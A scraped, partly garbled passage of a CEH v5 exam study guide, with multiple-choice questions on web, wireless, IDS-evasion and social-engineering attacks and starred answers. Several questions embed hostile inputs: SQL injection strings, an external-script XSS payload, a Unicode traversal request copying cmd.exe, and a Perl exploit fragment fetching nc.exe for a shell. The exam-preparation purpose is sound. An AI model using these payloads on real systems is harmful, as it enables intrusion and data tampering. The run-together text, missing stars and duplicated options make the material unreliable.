26. Kevin sends an email invite to Chris to visit a forum for security professionals. Chrisclicks on the link in the email message and is taken to a web based bulletin board.
Unknown to Chris, certain functions are executed on his local system under his privileges,which allow Kevin access to information used on the BBS. However, no executables aredownloaded and run on the local system. What would you term this attack?a. Phishing b. Backdoor installationc. Denial of Serviced. Cross Site Scripting*
27. ______________ is the process of converting something from one representation tothe simplest form. It deals with the way in which systems convert data from one form toanother.a. UCS transformation formats b. Canonicalization*c. Character Mappingd. Character Encoding
28. Identify SQL injection attack from the HTTP requests shown belowa. http://www.myserver.c0m/search.asp?lname=smith%27%3bupdate%20usertable%20set%20passwd%3d%27hAx0r%27%3b--%00* b. http://www.myserver.c0m/script.php?mydata=%3cscript%20src=%22http%3a%2f%2fwww.yourserver.c0m%2fbadscript.js%22%3e%3c%2fscript%3ec. http://host/cgiin/ bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-ald. http://www.victim.com/example?accountnumber=67891&creditamount=999999999
29. ___________ ensures that the enforcement of organizational security policy does notrely on voluntary web application user compliance. It secures information by assigning
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 33/90
sensitivity labels on information and comparing this to the level of sensitivity a user isoperating at.a. Discretionary Access Control b. Mandatory Access Control*c. Role-based Access Control
d. Authorized Access Control30. Kevin has been asked to write a short program to gather user input for a webapplication.He likes to keep his code neat and simple. His chooses to use printf(str)where heshould have ideally used printf(“%s”, str). What attack will his program exposethe web application to?a. Cross Site Scripting b. Format String Attack*c. Unicode Traversal Attack d. SQL injection Attack
31. StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), andMicrosoft's/GS option use _________ defense against buffer overflow attacks.a. Hex editing b. Format checkingc. Canary*d. Non-executing stack
32. How will you differentiate between SSL and S-HTTP?a. SSL operates at the transport layer and S-HTTP operates at the application layer* b. SSL operates at the network layer and S-HTTP operates at the application layer c. SSL operates at the application layer and S-HTTP operates at the network layer d. SSL operates at the application layer and S-HTTP operates at the transport layer
33. _____________ is a type of symmetric-key encryption algorithm that transforms afixed-length block of plaintext (unencrypted text) data into a block of ciphertext(encrypted text) data of the same length.a. Stream Cipher b. Bit Cipher c. Block Cipher*d. Hash Cipher
34. ________________ is any process through which one proves and verifies certaininformation.a. Identification b. Verificationc. Enumerationd. Authentication*
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 34/90
John has a proxy server on his network which caches and filters web access. He has shutdown allunnecessary ports and services. Additionally, he has installed a firewall (Cisco PIX) thatwill notallow users to connect to any outbound ports. Jack, a network user has successfully
connected to aremote server on port 80 using netcat. He could in turn drop a shell from the remotemachine.Q1 John wants to harden his network such that a remote user does not do the same to hisnetwork. Choose the option that can be easily and more effectively implemented.a. Do not use a proxy as application layer does not provide adequate protection b. Limit HTTP CONNECT on the network*c. Sniff the traffic and look for lengthy connection periodsd. Filter port 80
Q2 Assuming an attacker wants to penetrate John’s network, which of the following
options is helikely to choose?a. Use reverse shell using FTP protocol b. Use HTTPTunnel or Stunnel on port 80 and 443*c. Use Monkey shelld. Use ClosedVPN
Derek has stumbled upon a wireless network and wants to assess its security. However,he doesnot find enough traffic for a good capture. He intends to use AirSnort on the capturedtraffic tocrack the WEP key and does not know the IP address range or the AP.Q4. How can he generate traffic on the network so that he can capture enough packets tocrack the WEP key?a. Derek can use a session replay on the packets captured b. Derek can use KisMAC as it needs two USB devices to generate trafficc. Use Ettercap to discover the gateway and ICMP ping flood tool to generate traffic*d. Use any ARP requests found in the capture
Q5 Why does Derek need to capture five to ten million packets in order to crack WEPwith Air Snort?a. Air Snort implements the FMS attack and only encrypted packets are counted* b. All IVs are vulnerable to attack c. A majority of weak IVs transmitted by access points and wireless cards are not filtered bycontemporary wireless manufacturersd. Air Snort uses a cache of packets
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 35/90
Q6 Derek would like your advice on using a tool that can save him time and get him better resultswith lesser packets. You would like to recommend a tool that uses KoreK’simplementation.Which tool would you recommend from the list below?
a. John the Ripper b. Shmooc. Aircrack*d. Kismet
Q7 Derek re-injects a captured packet back onto the network. He does this hundreds of timeswithin a second. The packet is correctly encrypted and Derek assumes it is an ARPrequest packet.The wireless host responds with a stream of responses, all individually encrypted withdifferent
IVs. What is this attack most appropriately called?a. Injection attack b. Replay attack*c. Spoof attack d. Rebound attack
Q8 Derek discovers that the wireless AP transmits 128 bytes of plaintext, and the stationresponds by encrypting the plaintext. It then transmits the resulting ciphertext using the same keyandcipher that are used by WEP to encrypt subsequent network traffic. What authenticationmechanism is being followed here?a. no authentication b. open system authenticationc. shared key authentication*d. single key authentication
Your system has been compromised. From the logs available, you notice certaincommands. Youtry to reconstruct the events from the entries available. You suspect that the attacker hasexploited the Unicode vulnerability.Q9 As inferred from the following entry what is the attacker attempting to do?GET/…/…À/winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exeHTTP/1.1a. Copy cmd.exe to the directory the hacker will work from* b. Replace the original cmd.exe on the compromised machinec. Rename cmd.exe to cmdl.exe in order to deface the webpaged. Drop a shell from the remote computer
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 36/90
Q 10 As inferred from the following entry which of the following statements describestheattacker’s effort?cmd/c C:\ProgramFiles\CommonFiles\system\...\pdump.exe>>C:\mine.txta. Enumerate users and passwords with Password Dump
b. Copy pdump.exe and rename it to mine.txtc. Execute pdump.exe and save into mine.txt*d. Copy mine.txt into the directory where pdump.exe resides
What is the hacker really trying to steal?a. har.txt b. SAM file*c. Repair filed. Exploits
Q16 Liza has forgotten her password to an online book shelf. The web application asks
her to keyin her email so that they can send her the password. Liza enters her [email protected]’.The application displays server error. What is wrong with the web application?a. The web server may be down b. The email is not validc. The ISP connection is not reliabled. User input is not sanitized*
Q17 Bryan notices the error on the web page and asks Liza to enter liza’ or ‘1’=’1 in theemail field. They are greeted with a message “Your login information has been mailed to [email protected]”. What do you think has occurred?a. The web application returned the first record it found* b. The web application picked up a record at randomc. The web application emailed the administrator about the error d. The server error has caused the application to malfunction
Q18 Bryan is convinced that the web application is vulnerable to SQL injection. Heknows that theinjection is successful if he receives a response indicating that the login information has beenmailed to a user. He inputs [email protected]' AND passwd = 'janedoe. Theapplicationinforms that the login information has been mailed to [email protected]. However,Bryan isnot concerned about John Doe being tipped off. What could be the reason behind this?
a. John wouldn’t consider the mail seriously as he has not asked for it b. John would not be able to login anywayc. Bryan has John’s password and can use it immediately*
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 37/90
d. Bryan can view John’s account details and re-login anytime
Q19 Bryan inserts the following into the email field.x'; UPDATE members SET email = '[email protected]' WHERE email ='[email protected]
What do you think this would result in?a. Web application responds “This is not a valid email id” b. Web application responds “Your login information has been mailed to [email protected]”*c. Web application responds “Your login information has been mailed to [email protected]”d. Web application responds “Server error”
Q20 Dave has been assigned to test the network security of Acme Corp. The test wasannouncedto the employees. He created a webpage to discuss the progress of the tests with
employees whowere interested in following the test. Visitors were allowed to click on a sand clock tomark the progress of the test. Dave successfully embeds a keylogger He also added some statisticson thewebpage. The firewall protects the network well and allows strict Internet access.How was security compromised and how did the firewall respond?a. The attack did not fall through as the firewall blocked traffic b. The attack was social engineering and the firewall did not detect it*c. Security was not compromised as the webpage was hosted internallyd. The attack was deception and security was not directly compromised
Q21 What is the most common vehicle for social engineering attacks?a. Peer to Peer networks b. Local Area Networksc. Emaild. Direct in person*
Q22 Oregon Corp is fighting a litigation suit with Scamster Inc. Oregon has assigned a privateinvestigative agency to go through garbage, recycled paper, and other rubbish atScamster’s officesite in order to find relevant information. What would you call this kind of activity?a. CI Gathering b. Scanningc. Dumpster Diving*d. Garbage Scooping
Q23 Sabotage, Advertising and Covering are the three stages of ______________ a. Social engineering
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 38/90
b. Reverse Social Engineering*c. Reverse Software Engineeringd. Rapid Development Engineering
Q24 Which of the following attacks takes best advantage of an existing authenticated
connectiona. Password Sniffing b. Spoofingc. Session Hijacking*d. Password Guessing
Q25 ________________ is the extraction of user names, machine names, network resources,shares and servicesa. Sniffing b. Enumeration*
c. Scanningd. Cracking
Q26 ________________ is the process of mapping out the tables on the databasea. Database Fingerprinting* b. Database Scanningc. Database Enumerationd. Database Injection
Q27 What is the expected result of the following exploit?#################################################################$port = 53; # Spawn cmd.exe on port X$your = "192.168.1.1"; # Your FTP Server $user = "Anonymous"; # login as$pass = '[email protected]'; # password#################################################################$host = $ARGV[0]; print "Starting ...\n"; print "Server will download the file nc.exe from $your FTP server.\n";a. Opens up a telnet listener that requires no username or password b. Creates an FTP server with write permissions enabledc. Creates a share called “sasfile” on the target systemd. Creates an account with a username of Anonymous and a password of [email protected]*
Q28 Acme Inc has recently introduced a search feature on its website for its range of washingmachines. Dan entered <script>alert(‘You have just won a washingmachine’)</script>. When he presses the search button, a pop up box appears on hisscreen with the text “You have just won a washing machine”. What is Acme Inc’s
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 39/90
websitevulnerable to?a. Cookie Poisoning b. Session Hijackingc. Cross Site Scripting*
d. Web server hackingQ29 You want to carry out session hijacking on a remote server. The server and the clientarecommunicating via TCP after a successful TCP three way handshake. The server has justreceived packet #155 from the client. The client has a receive window of 230 and the server has areceivewindow of 280. Within what range of sequence numbers should a packet, sent by theclient fall inorder to be accepted by the server?
a. 200-280 b. 156-436*c. 155-435d. 155-231e. 155-530
Q31 Jack is testing the perimeter security of DMC corp. He has identified a system in thedemilitarized zone. Using Hping and nmap, he has verified that telnet service is runningon themachine. To minimize his footprint, he spoofs his IP while attempting to telnet into thenetwork.However, he is still unable to telnet into the network. What do you think is the reason?
a. The demilitarized zone is secured by a firewall b. Jack cannot successfully use TCP while spoofing his IP*c. Jack needs to use a tool such as nmap to telnet insided. The target system does not reply to telnet even when the service is running
Q32 What is the essential difference between an ‘Ethical Hacker’ and a ‘Cracker’?a. The ethical hacker does not use the same techniques or skills as a cracker b. The ethical hacker does it strictly for financial motives unlike a cracker c. The ethical hacker has authorization from the owner of the target*d. The ethical hacker is just a cracker who is getting paid
Q33 When a malicious hacker identifies a target and wants to eventually compromise thistarget,what would be among the first steps that he would perform? Choose one.a. Cover his tracks by eradicating the log files and audit trails b. Gain access to the remote computer in order to conceal the venue of attacksc. Perform a reconnaissance of the remote target for identification of venue of attacks*
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 40/90
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 41/90
c. Jamming*d. Scooping
Q41 Jack supports the parasitic grid movement actively. The grid is an undergroundmovement to
deploy free wireless access zones in metropolitan areas. Jack is part of the group of volunteersdeploying, at their own expense, a wireless access point on the outside of their home, or at worstat a window, with the access point connected to the volunteer's PC. What tool can anattacker useto hide his access point among legitimate access points and steal credentials?
a. Dsniff b. AirSnortc. Netstumbler
d. Fake AP*Q42 In a switched network, the traffic flows as shown below:Step 1: Node A transmits a frame to Node C.Step 2: The switch will examine this frame and determine what the intended host is. Itwill thenset up a connection between Node A and Node C so that they have a 'private' connection.Step 3: Node C will receive the frame and will examine the address. After determiningthat it isthe intended host, it will process the frame further Which of the following represents attacks that can help an attacker sniff on a switchednetwork?a. ARP Spoofing, Switch Hijacking, MAC corrupting b. ARP Spoofing, MAC Flooding, MAC duplicating*c. Switch Flooding, Switch Tampering, Switch Hijackingd. MAC Spoofing, Ethernet Flooding, MAC harvesting
Q44 What is the advantage in encrypting the communication between the agent and themonitor in an Intrusion Detection System?a. Encryption of agent communications will conceal the presence of the agents b. Alerts are sent to the monitor when a potential intrusion is detectedc. The monitor will know if counterfeit messages are being generated because they willnot be encrypted*d. An intruder could intercept and delete data or alerts and the intrusion can goundetected
Q45 How would you describe a simple yet very effective mechanism for sending andreceiving
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 42/90
unauthorized information or data between machines without alerting any firewalls andIDS’s on anetwork?a. Crafted Channel b. Covert Channel*
c. Deceptive Channeld. Bounce Channel
Q46 Ron has configured his network to provide strong perimeter security. As part of hisnetwork architecture, he has included a host that is fully exposed to attack. The system is on the publicside of the demilitarized zone, unprotected by a firewall or filtering router. What wouldyou callsuch a host?a. DMZ host
b. DWZ hostc. Honeypotd. Bastion Host*
Q47 Eric notices repeated probes to port 1080. He learns that the protocol being used isdesignedto allow a host outside of a firewall to connect transparently and securely through thefirewall. Hewonders if his firewall has been breached. What would be your inference?a. Eric has a Wingate package providing FTP redirection on his network b. Eric’s network has been penetrated by a firewall breachc. Somebody is using SOCKS on the network to communicate through the firewall*d. The attacker is using the ICMP protocol to have a covert channel
Q48 Basically, there are two approaches to network intrusion detection: signaturedetection, andanomaly detection. The signature detection approach utilizes well-known signatures for network traffic to identify potentially malicious traffic. The anomaly detection approach utilizes a previoushistory of network traffic to search for patterns that are abnormal, which would indicateanintrusion. How can an attacker disguise his buffer overflow attack signature such thatthere is agreater probability of his attack going undetected by the IDS?a. He can use polymorphic shell code – with a tool such as ADMmutate - to change thesignature of his exploit as seen by a network IDS* b. He can use a dynamic return address to overwrite the correct value in the targetmachine’s computer memoryc. He can use a shellcode that will perform a reverse telnet back to his machine
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 43/90
d. He can chain NOOP instructions into a NOOP “sled” that advances the processor’sinstruction pointer to a random place of choice
Q49 The following is an entry captured by a network IDSEVENT4: [NOOP:X86] (tcp,dp=515,sp=1592)
You are assigned the task of analyzing this entry. You notice the value 0x90, which is themostcommon NOOP instruction for the Intel processor. You figure that the attacker isattempting a buffer overflow attack. You also notice “/bin/sh” in the ASCII part of the output. As ananalystwhat would you concur about the attack?a. The attacker is attempting an buffer overflow attack and has succeeded b. The attacker is attempting an exploit that launches a command-line shell*c. The attacker is creating a directory on the compromised machined. The buffer overflow attack has been neutralized by the IDS
Q50 Most NIDS systems operate in layer 2 of the OSI model. These systems feed rawtraffic into adetection engine and rely on the pattern matching and/or statistical analysis to determinewhat ismalicious. Packets are not processed by the host’s TCP/IP stack – allowing the NIDS toanalyzetraffic the host would otherwise discard. Which of the following tools allows an attacker tointentionally craft packets to confuse pattern-matching NIDS systems, while still beingcorrectlyassembled by the host TCP/IP stack to render the attack payload?a. Tcpdump b. Tcpfragc. Defragd. Fragroute*
Q51 How would you describe an attack where an attacker attempts to deliver the payloadover multiple packets over long periods of time with the purpose of defeating simple patternmatchingin IDS systems without session reconstruction? A characteristic of this attack would be acontinuous stream of small packets.a. Session Hijacking b. Session Stealingc. Session Splicing*d. Session Fragmentation
Q52 Why would an attacker want to perform a scan on port 137?a. To disrupt the NetBIOS SMB service on the target host
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 44/90
b. To check for file and print sharing on windows systemsc. To discover proxy servers on a network d. To discover information about a target host using NBTSTAT*
Q53 Bob wants to prevent attackers from sniffing his passwords on the wired network.
Which of the following lists the best options?a. Kerberos, Smart card, Stanford SRP* b. SMB, SMTP, Smart cardc. RSA, LSA, POPd. SSID, WEP, Kerberos
Q54 Derek transmits an ARP to a non-broadcast address. He gets a response from amachine onthe network of its IP address. What must Derek infer?a. The machine has been trojaned by an attacker
b. The machine is running a sniffer in promiscuous mode*c. The machine is configured with a local address loopd. His system has its ARP cached and is looping back into the network
Q55 You receive an e-mail with the following message:Hello Jim,As part of our annual technical maintenance, we are backing all data to our data center inPhoenix. To protect your confidential information, we need you to reset your password by loggingonto our site athttp://[email protected]/resetpass/logon.htmIf you do not reset your password within 24 hours, your online banking facilities will besuspended.Sincerely,Technical SupportCitibank GroupFrom this e-mail you suspect that this message was sent by some hacker since you have beenreading much about phishing and suspect this could be a scam. You also observe theURL in themessage and confirm your suspicion about 0xde.0xad.0xbe.0xef which looks likehexadecimalnumbers. You immediately enter the following at the Windows 2000 command prompt: ping 0xde.0xad.0xbe.0xef You get a response with a valid IP address. What is the obstructed IP address in the e-mail URL?a. 222.173.190.239* b. 233.34.45.64c. 54.23.56.55d. 199.223.23.45
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 45/90
Q56 You receive an e-mail with the following message:Hello Steve,We are having technical difficulty in restoring user database records after the recent blackout.
Your account data is corrupted. Please logon on to SuperEmailServices.com and changeyour password.http://www.superemailservices.com%40c3405906949/support/logon.htmIf you do not reset your password within 7 days, your account will be permanentlydisabledlocking you out from using our e-mail services.Sincerely,Technical SupportSuperEmailServicesFrom this e-mail you suspect that this message was sent by some hacker since you have
beenusing their e-mail services for the last 2 years and they never sent out an e-mail such asthis. Youalso observe the URL in the message and confirm your suspicion about 3405906949which lookslike Base10 numbers. You immediately enter the following at the Windows 2000command prompt: ping 3405906949You get a response with a valid IP address. What is the obstructed IP address in the e-mail URL?a. 192.34.5.9 b. 10.0.3.4c. 203.2.4.5*d. 199.23.43.4
Q57 Neil notices that a single address is generating traffic from its port 500 to port 500 of severalother machines on the network. This scan is eating up most of the network bandwidth and Neil isconcerned. As a security professional, what would you infer from this scan?a. It is a worm that is malfunctioning or hardcoded to scan on port 500 b. The attacker is trying to determine the type of VPN implementation and checking for IPSec*c. The attacker is trying to detect machines on the network which have SSL enabledd. It is a network fault and the originating machine is in a network loop
Q58 Erik notices a big increase in UDP packets sent to port 1026 and 1027 occasionally.He entersthe following at the command prompt.
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 46/90
$ nc -l -p 1026 -u -vIn response, he sees the following message.(?(c)???漿?STOPALERT77STOP! WINDOWS REQUIRES IMMEDIATEATTENTION.Windows has found 47 Critical Errors.
To fix the errors please do the following:1. Download Registry Repair from: www.reg-patch.com2. Install Registry Repair 3. Run Registry Repair 4. Reboot your computer FAILURE TO ACT NOW MAY LEAD TO DATA LOSS AND CORRUPTION!What would you infer from this alert?a. It is a messenger spam. Windows creates a listener on one of the low dynamic portsfrom1026 to 1029 and the message usually promotes malware disguised as legitimate utilities* b. It is a genuine fault of windows registry and the registry needs to be backed up
c. An attacker has compromised the machine and backdoored ports 1026 and 1027d. The machine is redirecting traffic to www.reg-patch.com using adware
==========================================================
While attempting to discover the remote operating system on the targetcomputer, you receive the following results from
an nmap scan:Starting nmap V. 3.10ALPHA9 ( www.insecure.org/nmap/ )
Interesting ports on 172.121.12.222:(The 1592 ports scanned but not shown below are in state: filtered)
Port State Service
21/tcp open ftp25/tcp open smtp53/tcp closed domain
80/tcp open http443/tcp open httpsRemote operating system guess: Too many signatures match to reliably guess
the OS.Nmap run completed -- 1 IP address (1 host up) scanned in 277.483 secondsWhat would you do next to fingerprint the OS?
(Select the Best Answer)
• Run an nmap scan with the -vv option• Connect to the active services and review the banner information
• Perform a Firewalk with that system as the target IP
• Perform a tcp traceroute to the system using port 53
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 47/90
Which of the following LM hashes represents a password of less than 8characters?
(Select all that apply)
• BA810DBA98995F1817306D272A9441BB
44EFCE164AB921CQAAD3B435B51404EE
• 0182BD0BD4444BF836077A718CCDF409• CEC52EB9C8E3455DC2265B23734E0DAC
B757BF5C0D87772FAAD3B435B51404EE
• E52CAC67419A9A224A3B108F3FA6CB6D
You are scanning the target network for the first time. You are able to detect fewconventional open ports. While attempting to perform conventional service
identification by connecting to the open ports, the scan yields either bad or no
results. As you are unsure of the protocols in use, you want to discover as manydifferent protocols as possible. Which of the following scan options can help youachieve this?
(Select the Best Answer)
• Nessus scan with TCP based pings
• N m a p s c a n w i t h t h e _ s P ( P i n g s c a n ) s w i t c h
• N e t c a t s c a n w i t h t h e _ u _ e s w i t c h e s
• N m a p w i t h t h e _ s O ( R a w I P p a c k e t s ) s w i t c h
1 172.16.1.254 (172.16.1.254) 0.724 ms 3.285 ms 0.613 ms2 ip68-98-176-1.nv.nv.cox.net (68.98.176.1) 12.169 ms 14.958 ms 13.416 ms
3 ip68-98-176-1.nv.nv.cox.net (68.98.176.1) 13.948 ms ip68-100-0-1.nv.nv.cox.net
(68.100.0.1) 16.743 ms 16.207 ms4 ip68-100-0-137.nv.nv.cox.net (68.100.0.137) 17.324 ms 13.933 ms 20.938 ms
5 68.1.1.4 (68.1.1.4) 12.439 ms 220.166 ms 204.170 ms6 so-6-0-0.gar2.wdc1.Level3.net (67.29.170.1) 16.177 ms 25.943 ms 14.104 ms
7 unknown.Level3.net (209.247.9.173) 14.227 ms 17.553 ms 15.415 ms
8 so-0-1-0.bbr1.NewYork1.level3.net (64.159.1.41) 17.063 ms 20.960 ms 19.512ms
9 so-7-0-0.gar1.NewYork1.Level3.net (64.159.1.182) 20.334 ms 19.440 ms17.938 ms10 so-4-0-0.edge1.NewYork1.Level3.net (209.244.17.74) 27.526 ms 18.317 ms
21.202 ms11 uunet-level3-oc48.NewYork1.Level3.net (209.244.160.12) 21.411 ms 19.133
ms 18.830 ms
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 48/90
12 0.so-6-0-0.XL1.NYC4.ALTER.NET (152.63.21.78) 21.203 ms 22.670 ms20.111 ms
13 0.so-2-0-0.TL1.NYC8.ALTER.NET (152.63.0.153) 30.929 ms 24.858 ms23.108 ms14 0.so-4-1-0.TL1.ATL5.ALTER.NET (152.63.10.129) 37.894 ms 33.244 ms
33.910 ms15 0.so-7-0-0.XL1.MIA4.ALTER.NET (152.63.86.189) 51.165 ms 49.935 ms49.466 ms
16 0.so-3-0-0.XR1.MIA4.ALTER.NET (152.63.101.41) 50.937 ms 49.005 ms51.055 ms
17 117.ATM6-0.GW5.MIA1.ALTER.NET (152.63.82.73) 51.897 ms 50.280 ms53.647 ms
18 example-gw1.customer.alter.net (65.195.239.14) 51.921 ms 51.571 ms56.855 ms
19 www.example.com (65.195.239.22) 52.191 ms 52.571 ms 56.855 ms
20 www.example.com (65.195.239.22) 53.561 ms 54.121 ms 58.333 msYou perform the above traceroute and notice that hops 19 and 20 both show thesame IP address. What does this most likely indicate?
(Select the Best Answer)
• An application proxying firewall
A stateful inspection firewall
• A host based IDS
• A Honeypot
An employee wants to bypass detection by a network-based IDS application anddoes not want to attack the system containing
the IDS application. Which of the following strategies can the employee use toevade detection by a network-based IDS
application?(Select the Best Answer)
• Create a network tunnel
• Create multiple false positives
• Create a SYN flood
•
Create a ping flood
You are the Security Administrator of Xtrinity, Inc. You have discovered that an
employee has attached a modem to his telephone line and workstation. He hasused this modem to dial in to his workstation, thereby bypassing your firewall. A
security breach has occurred as a direct result of this activity. The employee
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 49/90
explains that he used the modem becausehe had to download software for a department project. How would you resolve
this situation?(Select the Best Answer)
• Reconfigure the firewall
• Conduct a needs analysis• Install a network-based IDS
• Enforce the corporate security policy
John wants to try a new hacking tool on his Linux system. As the applicationcomes from a site in his untrusted zone, John wants to ensure that the
downloaded tool has not been Trojaned. Which of the following options wouldindicate the best course of action for John?
(Select the Best Answer)
• Obtain the application via SSL• Obtain the application from a CD-ROM disc
• Compare the file's MD5 signature with the one published on the
distribution media
• Compare the file's virus signature with the one published on thedistribution media
Jack Hacker wants to break into Brown Co.'s computers and obtain their secretdouble fudge cookie recipe. Jack calls Jane, an accountant at Brown Co.,pretending to be an administrator from Brown Co. Jack tells Jane that there has
been a problem with some accounts and asks her to verify her password withhim ''just to double check our records.'' Jane does not suspect anything amiss,
and parts with her password. Jack can now access Brown Co.'s computers with avalid user name and password, to steal the cookie recipe. What kind of attack is
being illustrated here?(Select the Best Answer)
• Reverse Psychology
• Reverse Engineering• Social Engineering
• Spoofing Identity
• Faking Identity
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 50/90
Bank of Timbuktu was a medium-sized, regional financial institution in Timbuktu.The bank had deployed a new Internet-accessible Web application recently,
using which customers could access their account balances, transfer moneybetween accounts, pay bills and conduct online financial business using a Webbrowser. John Stevens was in charge of information security at Bank of
Timbuktu. After one month in production, several customers complained aboutthe Internet enabled banking application. Strangely, the account balances ofmany of the bank's customers had been changed! However, money hadn't been
removed from the bank. Instead, money was transferred between accounts.Given this attack profile, John Stevens reviewed the Web application's logs and
found the following entries:Attempted login of unknown user: johnm
Attempted login of unknown user: susaRAttempted login of unknown user: sencat
Attempted login of unknown user: pete'';
Attempted login of unknown user: ' or 1=1--Attempted login of unknown user: '; drop table logins--Login of user jason, sessionID= 0x75627578626F6F6B
Login of user daniel, sessionID= 0x98627579539E13BELogin of user rebecca, sessionID= 0x9062757944CCB811Login of user mike, sessionID= 0x9062757935FB5C64Transfer Funds user jason
Pay Bill user mike Logout of user mike What kind of attack did the Hackerattempt to carry out at the bank?
(Select the Best Answer)
• The Hacker attempted SQL Injection technique to gain access to a
valid bank login ID.
• The Hacker attempted Session hijacking, in which the Hacker opened an
account with the bank, then logged in to receive
• a session ID, guessed the next ID and took over Jason's session.
• Brute force attack in which the Hacker attempted guessing login ID andpassword from password cracking tools.
• Brute force attack in which the Hacker attempted guessing login ID andpassword from password cracking tools.
• The Hacker used a random generator module to pass results to the Web
server and exploited Web application CGI vulnerability.
Joseph is the Web site administrator for the Mason Insurance in New York,
whose primary website is located at www.masonins.com.Joseph uses his laptop computer regularly for website administration. One night,Joseph was notified by his associate that
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 51/90
the main Mason Insurance web site had been vandalized! In place of thelegitimate content, the hacker had left a message
''Hacker Message: You are dead! Freaks!''Joseph surfed to the Web site from his office, which was directly connected toMason Insurance's internal network using
his laptop. However, no changes were apparent to him and he could see thelegitimate content. Joseph was puzzled whenanother employee called in to report the defaced website. Joseph decided to
access the Web site using his dial-up ISPconnection, again using his laptop. He browsed to www.masonins.com to see the
following web page:H@cker Mess@ge: Y0u @re De@d! Fre@ks!
After seeing the defaced Web site, he disconnected his dial-up line, reconnectedto the internal network, and used Secure
Shell (SSH) to log in directly to the Web server. He ran Tripwire against the entire
Web site, and found that every systemfile and all the Web content on the server were intact.How did the attacker accomplish this hack?
(Select the Best Answer)
• DNS poisoning
• ARP spoofing
• SQL injection
• Routing table injection
Bob is acknowledged as a hacker of repute and is popular among visitors of'underground' sites. Bob is willing to share
his knowledge to those who are willing to learn, and many have expressed theirinterest in learning from him.However, this knowledge has a risk associated with it, as it can be used for
malevolent attacks as well. In this context, whatwould be the most effective method to bridge the knowledge gap between the"black" hats or crackers and the "white" hats
or computer security professionals?(Select the Best Answer)
• Educate everyone with books, articles and training on risk analysis,
vulnerabilities and safeguards
• Hire more computer security monitoring personnel to monitor computersystems and networks
• Make obtaining either a computer security certification or accreditationeasier to achieve so more individuals feel that they
• are a part of something larger than life
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 52/90
• Train more national guard and reservist in the art of computer security tohelp out in times of emergency or crises
While doing a penetration test, you discover that the organization is using onedomain for web publishing and another domainfor administration along with business operations. During what phase of the
penetration test would you normally discoverthis?
(Select the Best Answer)
• Port Scanning
Passive Information Gathering
• Active Attack
• Vulnerability Mapping
You are performing a port scan on a subnet that has the ICMP protocol blocked.You discover 23 live systems and afterdoing a port scan on each one of them, you notice that they all show port 21 inclosed state. What would be the next logical
step that you would perform?(Select the Best Answer)
• Connect to open ports to discover applications
• Perform a ping sweep to identify any additional systems that might be up• Perform a SYN scan on port 21 to identify any additional systems that
might be up
• Rescan every computer to verify the results
While probing an organization you discover that they have a wireless network.From your attempts to connect to the WLANyou determine that they are using MAC filtering by using ACL's on the access
points. What would be the easiest way to
circumvent this and communicate on the WLAN?(Select the Best Answer)
• Attempt to crack the WEP key using Airsnort
• Attempt to brute force the access point and update or delete the MACACL's
• Steal a client computer and use it to access the wireless network
• Sniff traffic off the WLAN and spoof your MAC address to the one
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 53/90
that you have captured
While scanning a network you observe that all of the web servers in the DMZ are
responding to ACK packets on port 80.What can you infer from this observation?(Select the Best Answer)
• They are using Windows based web servers
• They are using UNIX based web servers
• They are not using an Intrusion Detection System
• They are not using a stateful inspection firewall
You are conducting an IdleScan manually using Hping2. During the scanningprocess, you notice that almost every queryincrements the IPID - regardless of the port being queried. One or two of the
queries cause the IPID to increment by morethan one value. Which of the following options would be a possible reason?
(Select the Best Answer)
• The zombie you are using is not truly idle
• A stateful inspection firewall is resetting your queries
• Hping2 cannot be used for idlescanning
• These ports are actually open on the target system
You have successfully run a buffer overflow attack against a default IISinstallation running on a Windows 2000 server. The
server allows you to spawn a shell. In order to perform the actions you intend todo, you need elevated permission. You
need to know what your privileges are within the shell. Which of the followingoptions would be your current privileges?(Select the Best Answer)
•Administrator
• IUSR_COMPUTERNAME
• LocalSystem
• IIS default installation account
Starting nmap V. 3.10ALPHA9 ( www.insecure.org/nmap/ )
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 54/90
Interesting ports on 192.168.1.1:(The 1592 ports scanned but not shown below are in state: closed)
Port State Service21/tcp open ftp25/tcp open smtp
80/tcp open http443/tcp open httpsRemote operating system guess: Too many signatures match to reliably guess
the OS.Nmap run completed -- 1 IP address (1 host up) scanned in 91.66 seconds
